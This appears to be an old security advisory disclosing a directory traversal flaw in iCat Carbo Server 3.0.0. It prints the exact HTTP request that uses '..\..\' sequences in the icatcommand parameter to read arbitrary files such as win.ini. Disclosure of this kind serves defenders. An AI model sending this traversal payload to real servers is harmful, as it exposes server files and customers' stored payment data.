COMMAND

    iCat Server

SYSTEMS AFFECTED

    Systems running iCat Suite version 3.0

PROBLEM

    iCat Carbo Server is a program used to create interactive shopping
    catalogs for the www. It was selected by PC Magazine's editors  as
    the best Web storefront creation software.

    Mikael Johansson   found a  bug in  the iCat  Carbo Server Version
    3.0.0. The bug let's  everyone view any file  at a system that  is
    using Carbo (except for files with some special characters).   See
    for yourselves...

        http request:
        http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog

        http answer:
        [iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]

        Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'

    To view their c:\winnt\win.ini:

        http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog

    As you can  imagine this bug  is rather dangerous.  For example an
    evil hacker  could steal  creditcard information  from users  that
    have bought something at a site using Carbo Server 3.0.0.

SOLUTION

    No matter how good, it's still buggy.  For now, stay away from it.
    It surely will be fixed soon.